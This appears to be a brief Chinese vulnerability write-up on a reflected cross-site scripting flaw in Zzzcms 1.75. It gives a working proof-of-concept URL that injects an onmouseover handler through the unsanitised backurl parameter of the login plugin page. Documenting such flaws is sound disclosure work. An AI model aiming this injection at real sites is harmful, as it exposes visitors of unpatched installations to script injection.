Zzzcms 1.75 xss漏洞¶

一、漏洞简介¶

二、漏洞影响¶

Zzzcms 1.75

三、复现过程¶

http://url/plugins/template/login.php?backurl=1%20onmouseover%3dalert(9516)%20y%3d 

该onmouseover事件在移动到登录注册时会触发

对传入的backurl并没有做任何防护